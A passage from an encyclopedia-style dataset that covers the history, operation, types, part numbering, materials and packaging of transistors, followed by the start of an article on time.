experiments and observed that when two gold point contacts were applied to a crystal of germanium, a signal was produced with the output power greater than the input. Solid State Physics Group leader William Shockley saw the potential in this, and over the next few months worked to greatly expand the knowledge of semiconductors. The term transistor was coined by John R. Pierce as a contraction of the term transresistance. According to Lillian Hoddeson and Vicki Daitch, Shockley proposed that Bell Labs' first patent for a transistor should be based on the field-effect and that he be named as the inventor. Having unearthed Lilienfeld's patents that went into obscurity years earlier, lawyers at Bell Labs advised against Shockley's proposal because the idea of a field-effect transistor that used an electric field as a "grid" was not new. Instead, what Bardeen, Brattain, and Shockley invented in 1947 was the first point-contact transistor. To acknowledge this accomplishment, Shockley, Bardeen and Brattain jointly received the 1956 Nobel Prize in Physics "for their researches on semiconductors and their discovery of the transistor effect". Shockley's team initially attempted to build a field-effect transistor (FET) by trying to modulate the conductivity of a semiconductor, but was unsuccessful, mainly due to problems with the surface states, the dangling bond, and the germanium and copper compound materials. Trying to understand the mysterious reasons behind this failure led them instead to invent the bipolar point-contact and junction transistors. In 1948, the point-contact transistor was independently invented by physicists Herbert Mataré and Heinrich Welker while working at the Compagnie des Freins et Signaux Westinghouse, a Westinghouse subsidiary in Paris. Mataré had previous experience in developing crystal rectifiers from silicon and germanium in the German radar effort during World War II. With this knowledge, he began researching the phenomenon of "interference" in 1947. By June 1948, witnessing currents flowing through point-contacts, he produced consistent results using samples of germanium produced by Welker, similar to what Bardeen and Brattain had accomplished earlier in December 1947. Realizing that Bell Labs' scientists had already invented the transistor, the company rushed to get its "transistron" into production for amplified use in France's telephone network, filing his first transistor patent application on August 13, 1948. The first bipolar junction transistors were invented by Bell Labs' William Shockley, who applied for patent (2,569,347) on June 26, 1948. On April 12, 1950, Bell Labs chemists Gordon Teal and Morgan Sparks successfully produced a working bipolar NPN junction amplifying germanium transistor. Bell announced the discovery of this new "sandwich" transistor in a press release on July 4, 1951. The first high-frequency transistor was the surface-barrier germanium transistor developed by Philco in 1953, capable of operating at frequencies up to . They were made by etching depressions into an n-type germanium base from both sides with jets of indium(III) sulfate until it was a few ten-thousandths of an inch thick. Indium electroplated into the depressions formed the collector and emitter. AT&T first used transistors in telecommunications equipment in the No. 4A Toll Crossbar Switching System in 1953, for selecting trunk circuits from routing information encoded on translator cards. Its predecessor, the Western Electric No. 3A phototransistor, read the mechanical encoding from punched metal cards. The first prototype pocket transistor radio was shown by INTERMETALL, a company founded by Herbert Mataré in 1952, at the Internationale Funkausstellung Düsseldorf from August 29 to September 6, 1953. The first production-model pocket transistor radio was the Regency TR-1, released in October 1954. Produced as a joint venture between the Regency Division of Industrial Development Engineering Associates, I.D.E.A. and Texas Instruments of Dallas, Texas, the TR-1 was manufactured in Indianapolis, Indiana. It was a near pocket-sized radio with four transistors and one germanium diode. The industrial design was outsourced to the Chicago firm of Painter, Teague and Petertil. It was initially released in one of six colours: black, ivory, mandarin red, cloud grey, mahogany and olive green. Other colours shortly followed. The first production all-transistor car radio was developed by Chrysler and Philco corporations and was announced in the April 28, 1955, edition of The Wall Street Journal. Chrysler made the Mopar model 914HR available as an option starting in fall 1955 for its new line of 1956 Chrysler and Imperial cars, which reached dealership showrooms on October 21, 1955. The Sony TR-63, released in 1957, was the first mass-produced transistor radio, leading to the widespread adoption of transistor radios. Seven million TR-63s were sold worldwide by the mid-1960s. Sony's success with transistor radios led to transistors replacing vacuum tubes as the dominant electronic technology in the late 1950s. The first working silicon transistor was developed at Bell Labs on January 26, 1954, by Morris Tanenbaum. The first production commercial silicon transistor was announced by Texas Instruments in May 1954. This was the work of Gordon Teal, an expert in growing crystals of high purity, who had previously worked at Bell Labs. Field-effect transistors The basic principle of the field-effect transistor (FET) was first proposed by physicist Julius Edgar Lilienfeld when he filed a patent for a device similar to MESFET in 1926, and for an insulated-gate field-effect transistor in 1928. The FET concept was later also theorized by engineer Oskar Heil in the 1930s and by William Shockley in the 1940s. In 1945, JFET was patented by Heinrich Welker. Following Shockley's theoretical treatment on JFET in 1952, a working practical JFET was made in 1953 by George C. Dacey and Ian M. Ross. In 1948, Bardeen and Brattain patented the progenitor of MOSFET at Bell Labs, an insulated-gate FET (IGFET) with an inversion layer. Bardeen's patent, and the concept of an inversion layer, forms the basis of CMOS and DRAM technology today. In the early years of the semiconductor industry, companies focused on the junction transistor, a relatively bulky device that was difficult to mass-produce, limiting it to several specialized applications. Field-effect transistors (FETs) were theorized as potential alternatives, but researchers could not get them to work properly, largely due to the surface state barrier that prevented the external electric field from penetrating the material. MOSFET (MOS transistor) In 1955, Carl Frosch and Lincoln Derick accidentally grew a layer of silicon dioxide over the silicon wafer, for which they observed surface passivation effects. By 1957 Frosch and Derick, using masking and predeposition, were able to manufacture silicon dioxide field effect transistors; the first planar transistors, in which drain and source were adjacent at the same surface. They showed that silicon dioxide insulated, protected silicon wafers and prevented dopants from diffusing into the wafer. After this, J.R. Ligenza and W.G. Spitzer studied the mechanism of thermally grown oxides, fabricated a high quality Si/SiO2 stack and published their results in 1960. Following this research, Mohamed Atalla and Dawon Kahng proposed a silicon MOS transistor in 1959 and successfully demonstrated a working MOS device with their Bell Labs team in 1960. Their team included E. E. LaBate and E. I. Povilonis who fabricated the device; M. O. Thurston, L. A. D’Asaro, and J. R. Ligenza who developed the diffusion processes, and H. K. Gummel and R. Lindner who characterized the device. With its high scalability, much lower power consumption, and higher density than bipolar junction transistors, the MOSFET made it possible to build high-density integrated circuits, allowing the integration of more than 10,000 transistors in a single IC. Bardeen and Brattain's 1948 inversion layer concept forms the basis of CMOS technology today. The CMOS (complementary MOS) was invented by Chih-Tang Sah and Frank Wanlass at Fairchild Semiconductor in 1963. The first report of a floating-gate MOSFET was made by Dawon Kahng and Simon Sze in 1967. In 1967, Bell Labs researchers Robert Kerwin, Donald Klein and John Sarace developed the self-aligned gate (silicon-gate) MOS transistor, which Fairchild Semiconductor researchers Federico Faggin and Tom Klein used to develop the first silicon-gate MOS integrated circuit. A double-gate MOSFET was first demonstrated in 1984 by Electrotechnical Laboratory researchers Toshihiro Sekigawa and Yutaka Hayashi. The FinFET (fin field-effect transistor), a type of 3D non-planar multi-gate MOSFET, originated from the research of Digh Hisamoto and his team at Hitachi Central Research Laboratory in 1989. Importance Because transistors are the key active components in practically all modern electronics, many people consider them one of the 20th century's greatest inventions. The invention of the first transistor at Bell Labs was named an IEEE Milestone in 2009. Other Milestones include the inventions of the junction transistor in 1948 and the MOSFET in 1959. The MOSFET is by far the most widely used transistor, in applications ranging from computers and electronics to communications technology such as smartphones. It has been considered the most important transistor, possibly the most important invention in electronics, and the device that enabled modern electronics. It has been the basis of modern digital electronics since the late 20th century, paving the way for the digital age. The US Patent and Trademark Office calls it a "groundbreaking invention that transformed life and culture around the world". Its ability to be mass-produced by a highly automated process (semiconductor device fabrication), from relatively basic materials, allows astonishingly low per-transistor costs. MOSFETs are the most numerously produced artificial objects in history, with more than 13 sextillion manufactured by 2018. Although several companies each produce over a billion individually packaged (known as discrete) MOS transistors every year, the vast majority are produced in integrated circuits (also known as ICs, microchips, or simply chips), along with diodes, resistors, capacitors and other electronic components, to produce complete electronic circuits. A logic gate consists of up to about 20 transistors, whereas an advanced microprocessor, as of 2023, may contain as many as 134 billion transistors (and for exceptional chips, 2.6 trillion transistors, as of 2020). Transistors are often organized into logic gates in microprocessors to perform computation. The transistor's low cost, flexibility and reliability have made it ubiquitous. Transistorized mechatronic circuits have replaced electromechanical devices in controlling appliances and machinery. It is often easier and cheaper to use a standard microcontroller and write a computer program to carry out a control function than to design an equivalent mechanical system. Simplified operation A transistor can use a small signal applied between one pair of its terminals to control a much larger signal at another pair of terminals, a property called gain. It can produce a stronger output signal, a voltage or current, proportional to a weaker input signal, acting as an amplifier. It can also be used as an electrically controlled switch, where the amount of current is determined by other circuit elements. There are two types of transistors, with slight differences in how they are used: A bipolar junction transistor (BJT) has terminals labeled base, collector and emitter. A small current at the base terminal, flowing between the base and the emitter, can control or switch a much larger current between the collector and emitter. A field-effect transistor (FET) has terminals labeled gate, source and drain. A voltage at the gate can control a current between source and drain. The top image in this section represents a typical bipolar transistor in a circuit. A charge flows between emitter and collector terminals depending on the current in the base. Because the base and emitter connections behave like a semiconductor diode, a voltage drop develops between them. The amount of this drop, determined by the transistor's material, is referred to as VBE. (Base Emitter Voltage) Transistor as a switch Transistors are commonly used in digital circuits as electronic switches which can be either in an "on" or "off" state, both for high-power applications such as switched-mode power supplies and for low-power applications such as logic gates. Important parameters for this application include the current switched, the voltage handled, and the switching speed, characterized by the rise and fall times. In a switching circuit, the goal is to simulate, as near as possible, the ideal switch having the properties of an open circuit when off, the short circuit when on, and an instantaneous transition between the two states. Parameters are chosen such that the "off" output is limited to leakage currents too small to affect connected circuitry, the resistance of the transistor in the "on" state is too small to affect circuitry, and the transition between the two states is fast enough not to have a detrimental effect. In a grounded-emitter transistor circuit, such as the light-switch circuit shown, as the base voltage rises, the emitter and collector currents rise exponentially. The collector voltage drops because of reduced resistance from the collector to the emitter. If the voltage difference between the collector and emitter were zero (or near zero), the collector current would be limited only by the load resistance (light bulb) and the supply voltage. This is called saturation because the current is flowing from collector to emitter freely. When saturated, the switch is said to be on. The use of bipolar transistors for switching applications requires biasing the transistor so that it operates between its cut-off region in the off-state and the saturation region (on). This requires sufficient base drive current. As the transistor provides current gain, it facilitates the switching of a relatively large current in the collector by a much smaller current into the base terminal. The ratio of these currents varies depending on the type of transistor, and even for a particular type, varies depending on the collector current. In the example of a light-switch circuit, as shown, the resistor is chosen to provide enough base current to ensure the transistor is saturated. The base resistor value is calculated from the supply voltage, transistor C-E junction voltage drop, collector current, and amplification factor beta. Transistor as an amplifier The common-emitter amplifier is designed so that a small change in voltage (Vin) changes the small current through the base of the transistor whose current amplification combined with the properties of the circuit means that small swings in Vin produce large changes in Vout. Various configurations of single transistor amplifiers are possible, with some providing current gain, some voltage gain, and some both. From mobile phones to televisions, vast numbers of products include amplifiers for sound reproduction, radio transmission, and signal processing. The first discrete-transistor audio amplifiers barely supplied a few hundred milliwatts, but power and audio fidelity gradually increased as better transistors became available and amplifier architecture evolved. Modern transistor audio amplifiers of up to a few hundred watts are common and relatively inexpensive. Comparison with vacuum tubes Before transistors were developed, vacuum (electron) tubes (or in the UK "thermionic valves" or just "valves") were the main active components in electronic equipment. Advantages The key advantages that have allowed transistors to replace vacuum tubes in most applications are No cathode heater (which produces the characteristic orange glow of tubes), reducing power consumption, eliminating delay as tube heaters warm up, and immune from cathode poisoning and depletion. Very small size and weight, reducing equipment size. Large numbers of extremely small transistors can be manufactured as a single integrated circuit. Low operating voltages compatible with batteries of only a few cells. Circuits with greater energy efficiency are usually possible. For low-power applications (for example, voltage amplification) in particular, energy consumption can be very much less than for tubes. Complementary devices available, providing design flexibility including complementary-symmetry circuits, not possible with vacuum tubes. Very low sensitivity to mechanical shock and vibration, providing physical ruggedness and virtually eliminating shock-induced spurious signals (for example, microphonics in audio applications). Not susceptible to breakage of a glass envelope, leakage, outgassing, and other physical damage. Limitations Transistors may have the following limitations: They lack the higher electron mobility afforded by the vacuum of vacuum tubes, which is desirable for high-power, high-frequency operation such as that used in some over-the-air television transmitters and in travelling-wave tubes used as amplifiers in some satellites Transistors and other solid-state devices are susceptible to damage from very brief electrical and thermal events, including electrostatic discharge in handling. Vacuum tubes are electrically much more rugged. They are sensitive to radiation and cosmic rays (special radiation-hardened chips are used for spacecraft devices). In audio applications, transistors lack the lower-harmonic distortion the so-called tube sound which is characteristic of vacuum tubes, and is preferred by some. Types Classification |- style="text-align:center;" |||PNP||||P-channel |- style="text-align:center;" |||NPN||||N-channel |- style="text-align:center;" |BJT||||JFET|| |- style="text-align:center;" |||||||P-channel |- style="text-align:center;" |||||||N-channel |- style="text-align:center;" |colspan="2"|MOSFET enh||MOSFET dep|| Transistors are categorized by Structure: MOSFET (IGFET), BJT, JFET, insulated-gate bipolar transistor (IGBT), other type.. Semiconductor material (dopants): The metalloids; germanium (first used in 1947) and silicon (first used in 1954)—in amorphous, polycrystalline and monocrystalline form. The compounds gallium arsenide (1966) and silicon carbide (1997). The alloy silicon–germanium (1989) The allotrope of carbon graphene (research ongoing since 2004), etc. (see Semiconductor material). Electrical polarity (positive and negative): NPN, PNP (BJTs), N-channel, P-channel (FETs). Maximum power rating: low, medium, high. Maximum operating frequency: low, medium, high, radio (RF), microwave frequency (the maximum effective frequency of a transistor in a common-emitter or common-source circuit is denoted by the term , an abbreviation for transition frequency—the frequency at which the transistor yields unity voltage gain) Application: switch, general purpose, audio, high voltage, super-beta, matched pair. Physical packaging: through-hole metal, through-hole plastic, surface mount, ball grid array, power modules (see Packaging). Amplification factor , (transistor beta) or (transconductance). Working temperature: Extreme temperature transistors and traditional temperature transistors (). Extreme temperature transistors include high-temperature transistors (above ) and low-temperature transistors (below ). The high-temperature transistors that operate thermally stable up to can be developed by a general strategy of blending interpenetrating semi-crystalline conjugated polymers and high glass-transition temperature insulating polymers. Hence, a particular transistor may be described as silicon, surface-mount, BJT, NPN, low-power, high-frequency switch. Mnemonics Convenient mnemonic to remember the type of transistor (represented by an electrical symbol) involves the direction of the arrow. For the BJT, on an n–p–n transistor symbol, the arrow will "Not Point iN". On a p–n–p transistor symbol, the arrow "Points iN Proudly". However, this does not apply to MOSFET-based transistor symbols as the arrow is typically reversed (i.e. the arrow for the n–p–n points inside). Field-effect transistor (FET) The field-effect transistor, sometimes called a unipolar transistor, uses either electrons (in n-channel FET) or holes (in p-channel FET) for conduction. The four terminals of the FET are named source, gate, drain, and body (substrate). On most FETs, the body is connected to the source inside the package, and this will be assumed for the following description. In a FET, the drain-to-source current flows via a conducting channel that connects the source region to the drain region. The conductivity is varied by the electric field that is produced when a voltage is applied between the gate and source terminals, hence the current flowing between the drain and source is controlled by the voltage applied between the gate and source. As the gate–source voltage () is increased, the drain–source current () increases exponentially for below threshold, and then at a roughly quadratic rate: (, where is the threshold voltage at which drain current begins) in the "space-charge-limited" region above threshold. A quadratic behavior is not observed in modern devices, for example, at the 65 nm technology node. For low noise at narrow bandwidth, the higher input resistance of the FET is advantageous. FETs are divided into two families: junction FET (JFET) and insulated gate FET (IGFET). The IGFET is more commonly known as a metal–oxide–semiconductor FET (MOSFET), reflecting its original construction from layers of metal (the gate), oxide (the insulation), and semiconductor. Unlike IGFETs, the JFET gate forms a p–n diode with the channel which lies between the source and drains. Functionally, this makes the n-channel JFET the solid-state equivalent of the vacuum tube triode which, similarly, forms a diode between its grid and cathode. Also, both devices operate in the depletion-mode, they both have a high input impedance, and they both conduct current under the control of an input voltage. Metal–semiconductor FETs (MESFETs) are JFETs in which the reverse biased p–n junction is replaced by a metal–semiconductor junction. These, and the HEMTs (high-electron-mobility transistors, or HFETs), in which a two-dimensional electron gas with very high carrier mobility is used for charge transport, are especially suitable for use at very high frequencies (several GHz). FETs are further divided into depletion-mode and enhancement-mode types, depending on whether the channel is turned on or off with zero gate-to-source voltage. For enhancement mode, the channel is off at zero bias, and a gate potential can "enhance" the conduction. For the depletion mode, the channel is on at zero bias, and a gate potential (of the opposite polarity) can "deplete" the channel, reducing conduction. For either mode, a more positive gate voltage corresponds to a higher current for n-channel devices and a lower current for p-channel devices. Nearly all JFETs are depletion-mode because the diode junctions would forward bias and conduct if they were enhancement-mode devices, while most IGFETs are enhancement-mode types. Metal–oxide–semiconductor FET (MOSFET) The metal–oxide–semiconductor field-effect transistor (MOSFET, MOS-FET, or MOS FET), also known as the metal–oxide–silicon transistor (MOS transistor, or MOS), is a type of field-effect transistor that is fabricated by the controlled oxidation of a semiconductor, typically silicon. It has an insulated gate, whose voltage determines the conductivity of the device. This ability to change conductivity with the amount of applied voltage can be used for amplifying or switching electronic signals. The MOSFET is by far the most common transistor, and the basic building block of most modern electronics. The MOSFET accounts for 99.9% of all transistors in the world. Bipolar junction transistor (BJT) Bipolar transistors are so named because they conduct by using both majority and minority carriers. The bipolar junction transistor, the first type of transistor to be mass-produced, is a combination of two junction diodes and is formed of either a thin layer of p-type semiconductor sandwiched between two n-type semiconductors (an n–p–n transistor), or a thin layer of n-type semiconductor sandwiched between two p-type semiconductors (a p–n–p transistor). This construction produces two p–n junctions: a base-emitter junction and a base-collector junction, separated by a thin region of semiconductor known as the base region. (Two junction diodes wired together without sharing an intervening semiconducting region will not make a transistor.) BJTs have three terminals, corresponding to the three layers of semiconductor—an emitter, a base, and a collector. They are useful in amplifiers because the currents at the emitter and collector are controllable by a relatively small base current. In an n–p–n transistor operating in the active region, the emitter-base junction is forward-biased (electrons and holes recombine at the junction), and the base-collector junction is reverse-biased (electrons and holes are formed at, and move away from, the junction), and electrons are injected into the base region. Because the base is narrow, most of these electrons will diffuse into the reverse-biased base-collector junction and be swept into the collector; perhaps one-hundredth of the electrons will recombine in the base, which is the dominant mechanism in the base current. As well, as the base is lightly doped (in comparison to the emitter and collector regions), recombination rates are low, permitting more carriers to diffuse across the base region. By controlling the number of electrons that can leave the base, the number of electrons entering the collector can be controlled. Collector current is approximately β (common-emitter current gain) times the base current. It is typically greater than 100 for small-signal transistors but can be smaller in transistors designed for high-power applications. Unlike the field-effect transistor (see below), the BJT is a low-input-impedance device. Also, as the base-emitter voltage (VBE) is increased the base-emitter current and hence the collector-emitter current (ICE) increase exponentially according to the Shockley diode model and the Ebers-Moll model. Because of this exponential relationship, the BJT has a higher transconductance than the FET. Bipolar transistors can be made to conduct by exposure to light because the absorption of photons in the base region generates a photocurrent that acts as a base current; the collector current is approximately β times the photocurrent. Devices designed for this purpose have a transparent window in the package and are called phototransistors. Usage of MOSFETs and BJTs The MOSFET is by far the most widely used transistor for both digital circuits as well as analog circuits, accounting for 99.9% of all transistors in the world. The bipolar junction transistor (BJT) was previously the most commonly used transistor during the 1950s to 1960s. Even after MOSFETs became widely available in the 1970s, the BJT remained the transistor of choice for many analog circuits such as amplifiers because of their greater linearity, up until MOSFET devices (such as power MOSFETs, LDMOS and RF CMOS) replaced them for most power electronic applications in the 1980s. In integrated circuits, the desirable properties of MOSFETs allowed them to capture nearly all market share for digital circuits in the 1970s. Discrete MOSFETs (typically power MOSFETs) can be applied in transistor applications, including analog circuits, voltage regulators, amplifiers, power transmitters, and motor drivers. Other transistor types Field-effect transistor (FET): Metal–oxide–semiconductor field-effect transistor (MOSFET), where the gate is insulated by a shallow layer of insulator p-type MOS (PMOS) n-type MOS (NMOS) complementary MOS (CMOS) RF CMOS, for radiofrequency amplification, reception Multi-gate field-effect transistor (MuGFET) Fin field-effect transistor (FinFET), source/drain region shapes fins on the silicon surface GAAFET, Similar to FinFET but nanowires are used instead of fins, the nanowires are stacked vertically and are surrounded on 4 sides by the gate MBCFET, a variant of GAAFET that uses horizontal nanosheets instead of nanowires, made by Samsung. Also known as RibbonFET (made by Intel) and as horizontal nanosheet transistor. Thin-film transistor (TFT), used in LCD and OLED displays, types include amorphous silicon, LTPS, LTPO and IGZO transistors Floating-gate MOSFET (FGMOS), for non-volatile storage Power MOSFET, for power electronics lateral diffused MOS (LDMOS) Carbon nanotube field-effect transistor (CNFET, CNTFET), where the channel material is replaced by a carbon nanotube Ferroelectric field-effect transistor (Fe FET), uses ferroelectric materials Junction gate field-effect transistor (JFET), where the gate is insulated by a reverse-biased p–n junction Metal–semiconductor field-effect transistor (MESFET), similar to JFET with a Schottky junction instead of a p–n junction High-electron-mobility transistor (HEMT): GaN (Gallium Nitride), SiC (Silicon Carbide), Ga2O3 (Gallium Oxide), GaAs (Gallium Arsenide) transistors, MOSFETs, etc. Negative-Capacitance FET (NC-FET) Inverted-T field-effect transistor (ITFET) Fast-reverse epitaxial diode field-effect transistor (FREDFET) Organic field-effect transistor (OFET), in which the semiconductor is an organic compound Ballistic transistor (disambiguation) FETs used to sense the environment Ion-sensitive field-effect transistor (ISFET), to measure ion concentrations in solution, Electrolyte–oxide–semiconductor field-effect transistor (EOSFET), neurochip, Deoxyribonucleic acid field-effect transistor (DNAFET). Field-effect transistor-based biosensor (Bio-FET) Bipolar junction transistor (BJT): Heterojunction bipolar transistor, up to several hundred GHz, common in modern ultrafast and RF circuits Schottky transistor avalanche transistor Darlington transistors are two BJTs connected together to provide a high current gain equal to the product of the current gains of the two transistors Insulated-gate bipolar transistors (IGBTs) use a medium-power IGFET, similarly connected to a power BJT, to give a high input impedance. Power diodes are often connected between certain terminals depending on specific use. IGBTs are particularly suitable for heavy-duty industrial applications. The ASEA Brown Boveri (ABB) 5SNA2400E170100 , intended for three-phase power supplies, houses three n–p–n IGBTs in a case measuring 38 by 140 by 190 mm and weighing 1.5 kg. Each IGBT is rated at 1,700 volts and can handle 2,400 amperes Phototransistor. Emitter-switched bipolar transistor (ESBT) is a monolithic configuration of a high-voltage bipolar transistor and a low-voltage power MOSFET in cascode topology. It was introduced by STMicroelectronics in the 2000s, and abandoned a few years later around 2012. Multiple-emitter transistor, used in transistor–transistor logic and integrated current mirrors Multiple-base transistor, used to amplify very-low-level signals in noisy environments such as the pickup of a record player or radio front ends. Effectively, it is a very large number of transistors in parallel where, at the output, the signal is added constructively, but random noise is added only stochastically. Tunnel field-effect transistor, where it switches by modulating quantum tunneling through a barrier. Diffusion transistor, formed by diffusing dopants into semiconductor substrate; can be both BJT and FET. Unijunction transistor, which can be used as a simple pulse generator. It comprises the main body of either p-type or n-type semiconductor with ohmic contacts at each end (terminals Base1 and Base2). A junction with the opposite semiconductor type is formed at a point along the length of the body for the third terminal (Emitter). Single-electron transistors (SET), consist of a gate island between two tunneling junctions. The tunneling current is controlled by a voltage applied to the gate through a capacitor. Nanofluidic transistor, controls the movement of ions through sub-microscopic, water-filled channels. Multigate devices: Tetrode transistor Pentode transistor Trigate transistor (prototype by Intel) Dual-gate field-effect transistors have a single channel with two gates in cascode, a configuration optimized for high-frequency amplifiers, mixers, and oscillators. Junctionless nanowire transistor (JNT), uses a simple nanowire of silicon surrounded by an electrically isolated "wedding ring" that acts to gate the flow of electrons through the wire. Nanoscale vacuum-channel transistor, when in 2012, NASA and the National Nanofab Center in South Korea were reported to have built a prototype vacuum-channel transistor in only 150 nanometers in size, can be manufactured cheaply using standard silicon semiconductor processing, can operate at high speeds even in hostile environments, and could consume just as much power as a standard transistor. Organic electrochemical transistor. Solaristor (from solar cell transistor), a two-terminal gate-less self-powered phototransistor. Germanium–Tin Transistor Wood transistor Paper transistor Carbon-doped silicon–germanium (Si–Ge:C) transistor Diamond transistor Aluminum nitride transistor Super-lattice castellated field effect transistors Device identification Three major identification standards are used for designating transistor devices. In each, the alphanumeric prefix provides clues to the type of the device. Joint Electron Device Engineering Council (JEDEC) The JEDEC part numbering scheme evolved in the 1960s in the United States. The JEDEC EIA-370 transistor device numbers usually start with 2N, indicating a three-terminal device. Dual-gate field-effect transistors are four-terminal devices, and begin with 3N. The prefix is followed by a two-, three- or four-digit number with no significance as to device properties, although early devices with low numbers tend to be germanium devices. For example, 2N3055 is a silicon n–p–n power transistor, 2N1301 is a p–n–p germanium switching transistor. A letter suffix, such as "A", is sometimes used to indicate a newer variant, but rarely gain groupings. Japanese Industrial Standard (JIS) In Japan, the JIS semiconductor designation (|JIS-C-7012), labels transistor devices starting with 2S, e.g., 2SD965, but sometimes the "2S" prefix is not marked on the package–a 2SD965 might only be marked D965 and a 2SC1815 might be listed by a supplier as simply C1815. This series sometimes has suffixes, such as R, O, BL, standing for red, orange, blue, etc., to denote variants, such as tighter hFE (gain) groupings. European Electronic Component Manufacturers Association (EECA) The European Electronic Component Manufacturers Association (EECA) uses a numbering scheme that was inherited from Pro Electron when it merged with EECA in 1983. This scheme begins with two letters: the first gives the semiconductor type (A for germanium, B for silicon, and C for materials like GaAs); the second letter denotes the intended use (A for diode, C for general-purpose transistor, etc.). A three-digit sequence number (or one letter and two digits, for industrial types) follows. With early devices this indicated the case type. Suffixes may be used, with a letter (e.g. "C" often means high hFE, such as in: BC549C) or other codes may follow to show gain (e.g. BC327-25) or voltage rating (e.g. BUK854-800A). The more common prefixes are: Proprietary Manufacturers of devices may have their proprietary numbering system, for example CK722. Since devices are second-sourced, a manufacturer's prefix (like "MPF" in MPF102, which originally would denote a Motorola FET) now is an unreliable indicator of who made the device. Some proprietary naming schemes adopt parts of other naming schemes, for example, a PN2222A is a (possibly Fairchild Semiconductor) 2N2222A in a plastic case (but a PN108 is a plastic version of a BC108, not a 2N108, while the PN100 is unrelated to other xx100 devices). Military part numbers sometimes are assigned their codes, such as the British Military CV Naming System. Manufacturers buying large numbers of similar parts may have them supplied with "house numbers", identifying a particular purchasing specification and not necessarily a device with a standardized registered number. For example, an HP part 1854,0053 is a (JEDEC) 2N2218 transistor which is also assigned the CV number: CV7763 Naming problems With so many independent naming schemes, and the abbreviation of part numbers when printed on the devices, ambiguity sometimes occurs. For example, two different devices may be marked "J176" (one the J176 low-power JFET, the other the higher-powered MOSFET 2SJ176). As older "through-hole" transistors are given surface-mount packaged counterparts, they tend to be assigned many different part numbers because manufacturers have their systems to cope with the variety in pinout arrangements and options for dual or matched n–p–n + p–n–p devices in one pack. So even when the original device (such as a 2N3904) may have been assigned by a standards authority, and well known by engineers over the years, the new versions are far from standardized in their naming. Construction Semiconductor material The first BJTs were made from germanium (Ge). Silicon (Si) types currently predominate but certain advanced microwave and high-performance versions now employ the compound semiconductor material gallium arsenide (GaAs) and the semiconductor alloy silicon–germanium (SiGe). Single-element semiconductor material (Ge and Si) is described as elemental. Rough parameters for the most common semiconductor materials used to make transistors are given in the adjacent table. These parameters will vary with an increase in temperature, electric field, impurity level, strain, and sundry other factors. The junction forward voltage is the voltage applied to the emitter-base junction of a BJT to make the base conduct a specified current. The current increases exponentially as the junction forward voltage is increased. The values given in the table are typical for a current of 1 mA (the same values apply to semiconductor diodes). The lower the junction forward voltage the better, as this means that less power is required to "drive" the transistor. The junction forward voltage for a given current decreases with an increase in temperature. For a typical silicon junction, the change is −2.1 mV/°C. In some circuits special compensating elements (sensistors) must be used to compensate for such changes. The density of mobile carriers in the channel of a MOSFET is a function of the electric field forming the channel and of various other phenomena such as the impurity level in the channel. Some impurities, called dopants, are introduced deliberately in making a MOSFET, to control the MOSFET electrical behavior. The electron mobility and hole mobility columns show the average speed that electrons and holes diffuse through the semiconductor material with an electric field of 1 volt per meter applied across the material. In general, the higher the electron mobility the faster the transistor can operate. The table indicates that Ge is a better material than Si in this respect. However, Ge has four major shortcomings compared to silicon and gallium arsenide: Its maximum temperature is limited. It has relatively high leakage current. It cannot withstand high voltages. It is less suitable for fabricating integrated circuits. Because the electron mobility is higher than the hole mobility for all semiconductor materials, a given bipolar n–p–n transistor tends to be swifter than an equivalent p–n–p transistor. GaAs has the highest electron mobility of the three semiconductors. It is for this reason that GaAs is used in high-frequency applications. A relatively recent FET development, the high-electron-mobility transistor (HEMT), has a heterostructure (junction between different semiconductor materials) of aluminium gallium arsenide (AlGaAs)-gallium arsenide (GaAs) which has twice the electron mobility of a GaAs-metal barrier junction. Because of their high speed and low noise, HEMTs are used in satellite receivers working at frequencies around 12 GHz. HEMTs based on gallium nitride and aluminum gallium nitride (AlGaN/GaN HEMTs) provide still higher electron mobility and are being developed for various applications. Maximum junction temperature values represent a cross-section taken from various manufacturers' datasheets. This temperature should not be exceeded or the transistor may be damaged. Al–Si junction refers to the high-speed (aluminum-silicon) metal–semiconductor barrier diode, commonly known as a Schottky diode. This is included in the table because some silicon power IGFETs have a parasitic reverse Schottky diode formed between the source and drain as part of the fabrication process. This diode can be a nuisance, but sometimes it is used in the circuit. Packaging Discrete transistors can be individually packaged transistors or unpackaged transistor chips. Transistors come in many different semiconductor packages (see image). The two main categories are through-hole (or leaded), and surface-mount, also known as surface-mount device (SMD). The ball grid array (BGA) is the latest surface-mount package. It has solder "balls" on the underside in place of leads. Because they are smaller and have shorter interconnections, SMDs have better high-frequency characteristics but lower power ratings. Transistor packages are made of glass, metal, ceramic, or plastic. The package often dictates the power rating and frequency characteristics. Power transistors have larger packages that can be clamped to heat sinks for enhanced cooling. Additionally, most power transistors have the collector or drain physically connected to the metal enclosure. At the other extreme, some surface-mount microwave transistors are as small as grains of sand. Often a given transistor type is available in several packages. Transistor packages are mainly standardized, but the assignment of a transistor's functions to the terminals is not: other transistor types can assign other functions to the package's terminals. Even for the same transistor type the terminal assignment can vary (normally indicated by a suffix letter to the part number, q.e. BC212L and BC212K). Nowadays most transistors come in a wide range of SMT packages. In comparison, the list of available through-hole packages is relatively small. Here is a short list of the most common through-hole transistors packages in alphabetical order: ATV, E-line, MRT, HRT, SC-43, SC-72, TO-3, TO-18, TO-39, TO-92, TO-126, TO220, TO247, TO251, TO262, ZTX851. Unpackaged transistor chips (die) may be assembled into hybrid devices. The IBM SLT module of the 1960s is one example of such a hybrid circuit module using glass passivated transistor (and diode) die. Other packaging techniques for discrete transistors as chips include direct chip attach (DCA) and chip-on-board (COB). Flexible transistors Researchers have made several kinds of flexible transistors, including organic field-effect transistors. Flexible transistors are useful in some kinds of flexible displays and other flexible electronics.
Technology
Components
null
30012
https://en.wikipedia.org/wiki/Time
Time
Time is the continuous progression of existence that occurs in an apparently irreversible succession from the past, through the present, and into the future. It is a component quantity of various measurements used to sequence events, to compare the duration of events (or the intervals between them), and to quantify rates of change of quantities in material reality or in the conscious experience. Time is often referred to as a fourth dimension, along with three spatial dimensions. Scientists have theorized a beginning of time in the universe (the Big Bang) and an end (e.g., heat death or the Big Crunch). A cyclic model describes a cyclical nature, whereas the philosophy of eternalism views the subject from a different angle. Time is one of the seven fundamental physical quantities in both the International System of Units (SI) and International System of Quantities. The SI base unit of time is the second, which is defined by measuring the electronic transition frequency of caesium atoms. General relativity is the primary framework for understanding how spacetime works. Through advances in both theoretical and experimental investigations of spacetime, it has been shown that time can be distorted and dilated, particularly at the edges of black holes. Throughout history, time has been an important subject of study in religion, philosophy, and science. Temporal measurement has occupied scientists and technologists and has been a prime motivation in navigation and astronomy. Time is also of 